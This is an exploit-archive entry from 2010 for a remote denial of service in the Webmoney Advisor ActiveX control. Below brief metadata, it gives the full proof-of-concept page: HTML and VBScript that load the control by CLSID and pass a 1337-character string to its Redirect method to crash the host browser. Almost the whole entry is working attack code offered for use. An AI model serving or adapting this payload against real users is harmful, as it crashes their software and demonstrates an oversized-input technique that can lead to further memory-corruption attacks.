Webmoney Advisor - ActiveX Remote Denial of Service



EKU-ID: 19612 CVE: OSVDB-ID:
Author: Go0o$E Published: 2010-04-28 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


<html>
Pwnage Page
<object classid='clsid:3AFFD7F7-FD3D-4C9D-8F83-03296A1A8840' id='target' ></object>
<script language='vbscript'>

targetFile = "C:\Program Files\WebMoney Advisor\wmadvisor.dll"
prototype  = "Sub Redirect ( ByVal url As String )"
memberName = "Redirect"
progid     = "TOOLBAR3Lib.ToolbarObj"
argCount   = 1

arg1=String(1337, "A")
target.Redirect arg1
</script>